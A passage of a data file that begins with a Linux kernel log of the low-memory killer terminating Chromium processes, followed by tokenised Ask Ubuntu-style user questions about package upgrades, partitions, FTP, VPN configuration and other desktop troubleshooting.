accel ) acceleration profile 0 [ 22677.362 ] ( ** ) mlk rapoo 7100 : ( accel ) acceleration factor : 2.000 [ 22677.362 ] ( ** ) mlk rapoo 7100 : ( accel ) acceleration threshold : 4 /var/log/kern.log aug 31 17:01:34 thinkpad-edge kernel : [ 26657.342799 ] select 4510 ( chromium-browse ) , adj 300 , size 1403 , to kill aug 31 17:01:34 thinkpad-edge kernel : [ 26657.342808 ] select 7065 ( chromium-browse ) , adj 300 , size 10269 , to kill aug 31 17:01:34 thinkpad-edge kernel : [ 26657.342819 ] send sigkill to 7065 ( chromium-browse ) , adj 300 , size 10269 aug 31 17:01:34 thinkpad-edge kernel : [ 26657.344223 ] select 4510 ( chromium-browse ) , adj 300 , size 1403 , to kill aug 31 17:01:34 thinkpad-edge kernel : [ 26657.344230 ] select 7070 ( vc manager ) , adj 300 , size 10323 , to kill aug 31 17:01:34 thinkpad-edge kernel : [ 26657.344239 ] send sigkill to 7070 ( vc manager ) , adj 300 , size 10323 aug 31 17:01:34 thinkpad-edge kernel : [ 26657.347269 ] select 4510 ( chromium-browse ) , adj 300 , size 1403 , to kill aug 31 17:01:34 thinkpad-edge kernel : [ 26657.350905 ] select 4510 ( chromium-browse ) , adj 300 , size 1403 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.127569 ] select 4510 ( chromium-browse ) , adj 300 , size 1403 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.127582 ] select 10048 ( chromium-browse ) , adj 300 , size 1578 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.127590 ] send sigkill to 10048 ( chromium-browse ) , adj 300 , size 1578 aug 31 17:01:36 thinkpad-edge kernel : [ 26660.131328 ] select 4510 ( chromium-browse ) , adj 300 , size 1379 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.131338 ] select 10051 ( vc manager ) , adj 300 , size 1627 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.131348 ] send sigkill to 10051 ( vc manager ) , adj 300 , size 1627 aug 31 17:01:36 thinkpad-edge kernel : [ 26660.133869 ] select 4510 ( chromium-browse ) , adj 300 , size 1379 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.141198 ] select 4510 ( chromium-browse ) , adj 300 , size 1379 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.144465 ] select 4510 ( chromium-browse ) , adj 300 , size 1379 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.146763 ] select 4510 ( chromium-browse ) , adj 300 , size 1376 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.148907 ] select 4510 ( chromium-browse ) , adj 300 , size 1375 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.150934 ] select 4510 ( chromium-browse ) , adj 300 , size 1375 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.153567 ] select 4510 ( chromium-browse ) , adj 300 , size 1375 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.505539 ] select 4510 ( chromium-browse ) , adj 300 , size 1375 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.505558 ] send sigkill to 4510 ( chromium-browse ) , adj 300 , size 1375 aug 31 17:01:36 thinkpad-edge kernel : [ 26660.506585 ] select 4515 ( vc manager ) , adj 300 , size 1391 , to kill aug 31 17:01:36 thinkpad-edge kernel : [ 26660.506594 ] send sigkill to 4515 ( vc manager ) , adj 300 , size 1391 aug 31 17:01:37 thinkpad-edge kernel : [ 26660.743841 ] select 6129 ( chromium-browse ) , adj 100 , size 9577 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26660.743848 ] select 6160 ( chromium-browse ) , adj 300 , size 1271 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26660.743853 ] select 9946 ( chromium-browse ) , adj 300 , size 1298 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26660.743865 ] send sigkill to 9946 ( chromium-browse ) , adj 300 , size 1298 aug 31 17:01:37 thinkpad-edge kernel : [ 26660.744735 ] select 6129 ( chromium-browse ) , adj 100 , size 9577 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26660.744739 ] select 6160 ( chromium-browse ) , adj 300 , size 1271 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26660.744743 ] select 9949 ( vc manager ) , adj 300 , size 1328 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26660.744750 ] send sigkill to 9949 ( vc manager ) , adj 300 , size 1328 aug 31 17:01:37 thinkpad-edge kernel : [ 26660.745656 ] select 6129 ( chromium-browse ) , adj 100 , size 9577 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26660.745661 ] select 6160 ( chromium-browse ) , adj 300 , size 1271 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26660.748133 ] select 6129 ( chromium-browse ) , adj 100 , size 9577 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26660.748138 ] select 6160 ( chromium-browse ) , adj 300 , size 1271 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.152084 ] select 6129 ( chromium-browse ) , adj 100 , size 9536 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.152089 ] select 6160 ( chromium-browse ) , adj 300 , size 1252 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.152099 ] send sigkill to 6160 ( chromium-browse ) , adj 300 , size 1252 aug 31 17:01:37 thinkpad-edge kernel : [ 26661.227827 ] select 6129 ( chromium-browse ) , adj 100 , size 9535 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.227832 ] select 6163 ( vc manager ) , adj 300 , size 1302 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.227839 ] send sigkill to 6163 ( vc manager ) , adj 300 , size 1302 aug 31 17:01:37 thinkpad-edge kernel : [ 26661.445887 ] select 6129 ( chromium-browse ) , adj 100 , size 9535 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.446815 ] select 6129 ( chromium-browse ) , adj 100 , size 9535 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.447733 ] select 6129 ( chromium-browse ) , adj 100 , size 9535 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.448550 ] select 6129 ( chromium-browse ) , adj 100 , size 9535 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.450389 ] select 6129 ( chromium-browse ) , adj 100 , size 9535 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.451737 ] select 6129 ( chromium-browse ) , adj 100 , size 9530 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.453348 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.461250 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:37 thinkpad-edge kernel : [ 26661.462497 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26661.745699 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26661.745710 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26661.745714 ] select 10206 ( chromium-browse ) , adj 300 , size 1229 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26661.745725 ] send sigkill to 10206 ( chromium-browse ) , adj 300 , size 1229 aug 31 17:01:38 thinkpad-edge kernel : [ 26662.154626 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.154633 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.154635 ] select 10208 ( chrome_childiot ) , adj 300 , size 1286 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.154641 ] send sigkill to 10208 ( chrome_childiot ) , adj 300 , size 1286 aug 31 17:01:38 thinkpad-edge kernel : [ 26662.155208 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.155211 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.155735 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.155738 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.156287 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.156289 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.156859 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.156861 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.157419 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.157422 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.157968 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.157971 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.158505 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.158507 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.159109 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.159112 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.159658 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.159660 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.160547 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.160550 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.161541 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.161544 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.162544 ] select 6129 ( chromium-browse ) , adj 100 , size 9528 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.162547 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.163848 ] select 6129 ( chromium-browse ) , adj 100 , size 9524 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.163851 ] select 9960 ( chromium-browse ) , adj 300 , size 1223 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.164953 ] select 6129 ( chromium-browse ) , adj 100 , size 9514 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.164957 ] select 9960 ( chromium-browse ) , adj 300 , size 1222 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.166131 ] select 6129 ( chromium-browse ) , adj 100 , size 9513 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.166134 ] select 9960 ( chromium-browse ) , adj 300 , size 1222 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.167192 ] select 6129 ( chromium-browse ) , adj 100 , size 9513 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.167196 ] select 9960 ( chromium-browse ) , adj 300 , size 1222 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.168686 ] select 6129 ( chromium-browse ) , adj 100 , size 9513 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.168694 ] select 9960 ( chromium-browse ) , adj 300 , size 1222 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.170744 ] select 6129 ( chromium-browse ) , adj 100 , size 9509 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.170750 ] select 9960 ( chromium-browse ) , adj 300 , size 1222 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.247095 ] select 6129 ( chromium-browse ) , adj 100 , size 9459 , to kill aug 31 17:01:38 thinkpad-edge kernel : [ 26662.247103 ] select 9960 ( chromium-browse ) , adj 300 , size 1221 , to kill aug 31 17:01:39 thinkpad-edge kernel : [ 26662.247113 ] send sigkill to 9960 ( chromium-browse ) , adj 300 , size 1221 aug 31 17:01:39 thinkpad-edge kernel : [ 26662.469810 ] select 6129 ( chromium-browse ) , adj 100 , size 9454 , to kill aug 31 17:01:39 thinkpad-edge kernel : [ 26662.469820 ] select 9985 ( chromium-browse ) , adj 300 , size 1140 , to kill aug 31 17:01:39 thinkpad-edge kernel : [ 26662.469829 ] send sigkill to 9985 ( chromium-browse ) , adj 300 , size 1140 aug 31 17:01:39 thinkpad-edge kernel : [ 26662.470865 ] select 6129 ( chromium-browse ) , adj 100 , size 9454 , to kill aug 31 17:01:39 thinkpad-edge kernel : [ 26662.470871 ] select 9987 ( chrome_childiot ) , adj 300 , size 1222 , to kill aug 31 17:01:39 thinkpad-edge kernel : [ 26662.470878 ] send sigkill to 9987 ( chrome_childiot ) , adj 300 , size 1222 aug 31 17:01:39 thinkpad-edge kernel : [ 26662.472783 ] select 6129 ( chromium-browse ) , adj 100 , size 9395 , to kill aug 31 17:01:39 thinkpad-edge kernel : [ 26662.474938 ] select 6129 ( chromium-browse ) , adj 100 , size 9380 , to kill aug 31 17:01:39 thinkpad-edge kernel : [ 26662.477981 ] select 6129 ( chromium-browse ) , adj 100 , size 9380 , to kill aug 31 17:01:39 thinkpad-edge kernel : [ 26662.479629 ] select 6129 ( chromium-browse ) , adj 100 , size 9378 , to kill aug 31 17:01:39 thinkpad-edge kernel : [ 26662.641492 ] select 6129 ( chromium-browse ) , adj 100 , size 9370 , to kill aug 31 17:01:39 thinkpad-edge kernel : [ 26662.805430 ] select 6129 ( chromium-browse ) , adj 100 , size 9366 , to kill aug 31 17:01:39 thinkpad-edge kernel : [ 26662.805441 ] send sigkill to 6129 ( chromium-browse ) , adj 100 , size 9366 aug 31 17:01:39 thinkpad-edge kernel : [ 26662.806057 ] select 6131 ( dconf worker ) , adj 100 , size 9555 , to kill aug 31 17:01:39 thinkpad-edge kernel : [ 26662.806063 ] send sigkill to 6131 ( dconf worker ) , adj 100 , size 9555 aug 31 17:09:47 thinkpad-edge kernel : imklog 5.8.6 , log source = /proc/kmsg started . aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] initializing cgroup subsys cpuset aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] initializing cgroup subsys cpu aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] linux version 3.5.0-39-generic ( buildd @ roseapple ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 60~precise1-ubuntu smp wed aug 14 15:38:41 utc 2013 ( ubuntu 3.5.0-39.60~precise1-generic 3.5.7.17 ) aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] command line : boot_image=/boot/vmlinuz-3.5.0-39-generic root=uuid=2b1c65df-1673-4613-ae42-03f9ac0df181 ro quiet splash vt.handoff=7 aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] kernel supported cpus : aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] intel genuineintel aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] amd authenticamd aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] centaur centaurhauls aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] e820 : bios-provided physical ram map : aug 31 17:09:47 thinkpad-edge kernel : [ 0.000000 ] bios-e820 : [ mem 0x0000000000000000-0x000000000009c3ff ] usable
336985	why did my php5.5 upgrade fail ?	i have a relatively new install of ubuntu 12.04 . the php version is 5.3 , so i just followed this question to upgrade to 5.5 : how do i install latest php in supported ubuntu versions ( like 5.4.x in ubuntu 12.04 ) ? when i ran the final command though ( sudo apt-get upgrade ) , it gave me the following output : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : apache2 apache2-mpm-prefork apache2.2-bin libapache2-mod-php5 libjson0 php5-cli php5-common php5-mysql 0 upgraded , 0 newly installed , 0 to remove and 8 not upgraded . why does it 'keep packages back ' ?
336989	changing the icon theme has no effect ( 13.04 )	using gnome-shell 3.6 on ubuntu 13.04 . i installed gnome-tweak-tool , and i can use it to change both the shell theme and the current theme ( ie . window borders ) . however , changing the icon theme has no effect , regardless of whether a system set or custom set is selected . the setting is definitely saved , and i can also see it in dconf . for example : $ dconf read /org/gnome/desktop/interface/icon-theme 'oxygen' $ gsettings get org.gnome.desktop.interface icon-theme 'oxygen'
336990	how to fix incorrect filesystem property information ?	my hard drive has four partitions . windows 80gb ubuntu linux 70gb storage 530gb recovery 14gb i used gparted ( booted linux from pen drive ) to remove 30 gb from storage and subsequently re-allot it to ubuntu linux ( yes that 's 100 for linux , a lot , i know . just do n't worry about it lol . i 'm new . ) that finally finished and my partitions show up as their respective new sizes , however , the properties of my `` storage '' partition still show it holding the extra 30gb . the partition is 500gb but the filesystem properties still says 530gb like before , how do i fix this ?
336991	'i can not install wine in my ubuntu 12.04	here are the images i recently downloaded and installed ubuntu on my laptop . and now i want to switch back to windows ( sorry ) so i downloaded virtual box.exe . but the problem is i can not run .exe files on my ubuntu and neither can i download it because whenever i go to the software center i dont get the button to install anything ... what i get is 'more info ' button . here are some pictures regarding my problems.please help me otherwise my dad is gon na kill me because it is his laptop , not mine.. i am begging you guyz . how can i switch back to windows .
336992	how do i restore ubuntu 12.04 ?	os ubuntu 12.04 / hardware dell inspiron 3520 . i inserted my installation disc to reinstall ubuntu 12.04 , on my previous install i encrypted my home folder . the install failed , big surprise 0_0 . i have managed to log on to the ? server ? my installation is the desktop version . i can log in to my user account with my user name and password , i ca n't open firefox , i can ping google etc , and i can use apt-get . i have no gui . i tried running a diagnostic scan and everything is fine , except my hard drive , which seems to me , because it is still encrypted . how can i remove encryption , so i can reinstall ubuntu , or restore the previously working version ? warning to new users do n't reinstall your operating system while your home folder is encrypted .
336999	ftp help 12.04 server	i am very new to linux / ubuntu so please excuse my ignorance . i have installed ubuntu server 12.04 . i have installed vsftpd . i have edited vsftpd.conf and made sure i have uncommented local_enable & write_enable are set to yes . the vsftpd service is running . ports 20 & 21 have been allowed in ufw . i am able to ping to my router and also ping to www.google.co.uk so as far as i am aware that means dns is being resolved . i can also log on via ssh with no problems at all ( not sure if that has any relevance but thought i 'd mention it ) what i ca n't do is connect using 'filezilla ' , 'cuteftp ' etc . this is the msg i get back from filezilla i have restarted service . when i log in as anonymous i connect but ca n't do anything . i have double and treble checked username and password . as i say i log into ssh with same credentials ok everytime . status : connecting to 192.168.0.2:21 ... status : connection established , waiting for welcome message ... response : 220 ( vsftpd 2.3.5 ) command : user grant response : 331 please specify the password . command : pass ************* error : could not connect to server as i say i am very new at this so any help would be much appreciated .
337001	securing amazon ec2 ubuntu server	i 'm about to launch a product i 'm working on into alpha phase but before that i 'd like to ask a bit about securing my ubuntu server 64bit which is hosted at amazon aws ec2 . the problem is my software requires that any ip can connect to it and through any port because my software has to communicate with gameservers that the costumer own and the communication port can be anything . my software is taking in data from the client which is translated to text and then send to their gamerserver , if that gameserver is replying which will be text , that will be send to the client . my software is running on the standard ubuntu account i got with the server . i 've also set up ssh on the server so i can control it remotely . my concern is , if its easy to bypass my software and take control of the server . bad security . any advice , guidance , tips / tricks , firewall setup is more than welcome : ) regards kim
337002	can i delete system reserved ?	i 'm currently dual booting windows 7 and ubuntu ( both x64 ) . i was able to make it work after using boot-repair via livecd . i was wondering if i can delete windows ' system reserved partition , now that i 'm using grub ; so that i can make a swap partition for my ubuntu because i want to enable hibernate , and i learned after searching that it requires a swap partition . i already have 4 partitions : ( windows , system reserved , ubuntu , my files ( partition //ntfs ) so , would windows still work if i delete system reserved ?
337004	i18n vs qstr ( what is the difference )	in this tutorial http : //developer.ubuntu.com/resources/tutorials/getting-started/currency-converter-phone-app/ you can see i18n.tr was used for the internationalisation of text in the qml file . today i checked this tutorial : http : //qt-project.org/doc/qt-5.0/qtquick/qtquick-internationalization.html where they use another technique ( qstr ) . what is the difference between the two ? what makes one better than the other in some situations ?
337005	proxy settings not working in ubuntu12.04 but working fine with windows 7	proxy authentication settings are set properly in the /etc/apt/apt.conf and even in the network settings . but the sudo apt-get update command gives an error `` something wicked happend in resolving proxy . ( -5 - no hostname attached ) . this happens only with the connection in my room . it works normally with the internet connection in my friends room . but again the strange thing is , i have a windows 7 alongside ubuntu 12.04 and the proxy settings are working properly in windows ( even with my room 's connection ) . any help could be appreciated . thanks in advance..
337013	vmware player - unable to share folder . ( host-win8 , guest-ubuntu )	vm shared folder settings : what all i have tried : reinstalling vmware tools . uninstall , install vmware tools . turned windows firewall off . edit out /etc/fstab to include the following : .host : /desktop /mnt/hgfs vmhgfs defaults , ttl=5 , uid=1000 , gid=1000 0 0 edit out /etc/rc.local to include : mount.vboxsf -w desktop /mnt/hgfs none of these work . my /mnt/hgfs is still empty . any solutions for me ?
337015	gnome desktop environment	i know that this may be a silly question but i 'm really stucked here and i really do n't know how to go on with this : how can i install gnome in ubuntu 12.04 lts ? thank you in advance .
337016	horizontal lines with samsung series 9/intel ivy bridge	i have a new samsung 9 series laptop with intel ivy bridge graphics and a dual windows 8/ubuntu 13.04 boot configuration . as soon i reach the login screen my graphics goes awry : 1 ) black horizontal lines appear after a few seconds . they seem to be associated with bits of graphics rendered on the screen , and move around with them . they can leave a trace on the screen which persists for several minutes after a reboot . 2 ) at the top of the screen there are some lines a few pixels thick which flicker . edit : this is a known problem . see links in comments below . however , if i start the system with nomodeset or noacpi , these problems do not occur . but this limits the operation of the laptop and the screen backlight no longer works . i have installed intel-linux-graphics-installer and upgraded to the latest intel drivers .
337017	ca n't read partition table of 3tb usb disk	i 've connected a 3tb disk via sata and formatted it with a gpt partition table and added a single partition . now , after moving the disk into an external enclosure and connecting it via usb , the partition table wo n't be detected . scsi 6:0:0:0 : direct-access wdc wd30 efrx-68ax9n0 80.0 pq : 0 ansi : 5 sd 6:0:0:0 : attached scsi generic sg3 type 0 sd 6:0:0:0 : [ sdc ] 732566646 4096-byte logical blocks : ( 3.00 tb/2.72 tib ) sd 6:0:0:0 : [ sdc ] write protect is off sd 6:0:0:0 : [ sdc ] mode sense : 43 00 00 00 sd 6:0:0:0 : [ sdc ] write cache : disabled , read cache : enabled , does n't support dpo or fua sd 6:0:0:0 : [ sdc ] 732566646 4096-byte logical blocks : ( 3.00 tb/2.72 tib ) sdc : unknown partition table sd 6:0:0:0 : [ sdc ] 732566646 4096-byte logical blocks : ( 3.00 tb/2.72 tib ) sd 6:0:0:0 : [ sdc ] attached scsi disk it will work using the esata connection from the external enclosure . but not everybody has an esata port , so i need usb support too . i 've tried different ubuntu and kernel versions ( 12.04 with 3.2.0-52 , 13.04 with 3.8.0-29 , 13.04 with 3.9.0 ) ubuntu should support 3tb via usb should n't it ? edit : here is the log when i connect the disk via esata/sata scsi 5:0:0:0 : direct-access ata wdc wd30efrx-68a 80.0 pq : 0 ansi : 5 sd 5:0:0:0 : attached scsi generic sg2 type 0 sd 5:0:0:0 : [ sdc ] 5860533168 512-byte logical blocks : ( 3.00 tb/2.72 tib ) sd 5:0:0:0 : [ sdc ] 4096-byte physical blocks sd 5:0:0:0 : [ sdc ] write protect is off sd 5:0:0:0 : [ sdc ] mode sense : 00 3a 00 00 sd 5:0:0:0 : [ sdc ] write cache : enabled , read cache : enabled , does n't support dpo or fua sdc : sdc1 sd 5:0:0:0 : [ sdc ] attached scsi disk
337018	firefox not affected by gtk theme	how can i make firefox use adwaita theme like all other apps do ? good : bad : preferably also make web pages darker as well .
337020	bluettoh can not search for any device	siddhant @ falcon-x : ~ $ dmesg | grep bluetooth [ 11.129476 ] bluetooth : core ver 2.16 [ 11.129501 ] bluetooth : hci device and connection manager initialized [ 11.129748 ] bluetooth : hci socket layer initialized [ 11.129752 ] bluetooth : l2cap socket layer initialized [ 11.129762 ] bluetooth : sco socket layer initialized [ 12.921125 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 12.921126 ] bluetooth : bnep filters : protocol multicast [ 12.921132 ] bluetooth : bnep socket layer initialized [ 12.922574 ] bluetooth : rfcomm tty layer initialized [ 12.922581 ] bluetooth : rfcomm socket layer initialized [ 12.922582 ] bluetooth : rfcomm ver 1.11 siddhant @ falcon-x : ~ $ bt-adapter -i [ hci0 ] name : falcon-x-0 [ rw ] address : 9c:2a:70 : d3 : d8:38 class : 0x7e0100 discoverable : 1 [ rw ] discoverabletimeout : 0 [ rw ] discovering : 0 pairable : 1 [ rw ] pairabletimeout : 0 [ rw ] powered : 1 [ rw ] uuids : [ servicediscoveryserver , browsegroupdescriptor , 0000112d-0000-1000-8000-00805f9b34fb , headsetaudiogateway , handsfreeaudiogateway , handsfree , audiosource , audiosink , avremotecontroltarget , avremotecontrol , dialupnetworking , obexobjectpush , obexfiletransfer ] siddhant @ falcon-x : ~ $ bt-adapter âset discoverable 1 usage : bt-adapter [ option ... ] - a bluetooth adapter manager the above is the result of the above specified codes ... pls also refer the screenshots ... it keeps on searching for new device as shown in screenshot ... !
337024	file system on ubuntu 12.04 lts	how are files stored in ubuntu 12.04 ? in windows , if you look at your local disk ( c : ) , you will see that programs installed are traditionally kept in program files and program files ( x86 ) if you have a 64 bit system . further more , each user 's folders such as documents , downloads , pictures , etc . can be accessed through c : \users\ where are the different users ' folders ( documents , downloads , etc . ) located in for ubuntu 12.04 . suppose i have setup multiple users on ubuntu . how can i access another user 's folders ? and lastly , where are the 'installed files ' kept ?
337027	package installation error	i was trying to install mysql server 5.6 via deb file and the software installer froze and force quited . after that when i tried to install mysql via the command sudo apt-get install mysql-server its giving me this error e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . so i tried to remove mysql via this command sudo dpkg -- configure -a after then when i was trying to setup mysql its giving me this errors the package mysql needs to be reinstalled , but i ca n't find an archive for it . please help ! !
337028	can ubuntu query the modem or router for the ip address given by his isp and log that ?	i am connected to internet through an adsl modem , my isp gives me an ip address , does ubuntu log this ip address somewhere ? how can i configure ubuntu to log the ip address ?
337032	i can not initialize boot drive	i have ubuntu 64 bits 12.04 which i installed in april 2012 and it works fine . however , since last week , i have difficulties when rebooting ( i had to use boot-repair ) and now i do n't have any write permissions on my main drive ( in nautilus , i do n't even have the option to create a new folder ) moreover , i have noticed in gparted an error that i do n't understand : please see attached screenshot . if anyone has an idea to point me to a possible fix , that would be much appreciated ( without reinstalling ubuntu from scratch if possible ! ! ) edit : as suggested , i have unmounted the boot partition and have run a `` check '' in gparted . here is the result..
337034	i have installed ubuntu 13.04 , but it ca n't work normally	i have installed ubuntu 13.04 amd64 successfully , but it ca n't boot normally . the computer is dead after displaying the logo ubuntu and the screen is red . strangely , booting from recovery mode then repairing packages , it can boot normally . what can i do ? i think the problem is too difficult for me , i decide to abandon ubuntu . thank you all very much
337035	ubuntu connection to tv problem	one problem . i was planning on watching a football match with my friends the other day , and i connected my laptop to the tv ( we were streaming the match ) . so , what i thought would happen , was that i thought the content on the screen of the laptop will be projected onto the tv screen . but what happened was i had a totally independent workspace , desktop , or how it 's called properly , on my tv , with the match playing on laptop only . how can i set my laptop to project it 's screen onto the tv ? edit : ubuntu 12.04 64bit
337036	openswan 's ipsec verify fails on `` two or more interfaces found , checking ip forwarding ''	i 'm trying to set an l2tp/ipsec vpn . i have installed openswan from the repository on ubuntu 13.04 section : universe/net architecture : amd64 version : 1:2.6.38-1 and configured it following the community docs . # cat /etc/ipsec.conf config setup nat_traversal=yes virtual_private= % v4:10.0.0.0/8 , % v4:192.168.0.0/16 , % v4:172.16.0.0/12 , % v4 : ! 192.168.23.0/24 oe=off protostack=netkey conn l2tp-psk-nat rightsubnet=vhost : % priv also=l2tp-psk-nonat conn l2tp-psk-nonat authby=secret pfs=no auto=add keyingtries=3 rekey=no # apple ios does n't send delete notify so we need dead peer detection # to detect vanishing clients dpddelay=30 dpdtimeout=120 dpdaction=clear # set ikelifetime and keylife to same defaults windows has ikelifetime=8h keylife=1h type=transport # replace ip address with your local ip ( private , behind nat ip is okay as well ) left=my.ip # for updated windows 2000/xp clients , # to support old clients as well , use leftprotoport=17/ % any leftprotoport=17/1701 right= % any rightprotoport=17/ % any # force all to be nat'ed . because of ios forceencaps=yes it starts fine but fails the verification # ipsec verify checking your system to see if ipsec got installed and started correctly : version check and ipsec on-path [ ok ] linux openswan u2.6.38/k3.8.0-29-generic ( netkey ) checking for ipsec support in kernel [ ok ] saref kernel support [ n/a ] netkey : testing xfrm related proc values [ ok ] [ ok ] [ ok ] checking that pluto is running [ ok ] pluto listening for ike on udp 500 [ ok ] pluto listening for nat-t on udp 4500 [ ok ] two or more interfaces found , checking ip forwarding [ failed ] checking nat and masqueradeing [ ok ] checking for 'ip ' command [ ok ] checking /bin/sh is not /bin/dash [ ok ] checking for 'iptables ' command [ ok ] opportunistic encryption support [ disabled ] even though forwarding seems to be enabled # cat /proc/sys/net/ipv4/ip_forward 1 what 's wrong and how do i fix it ?
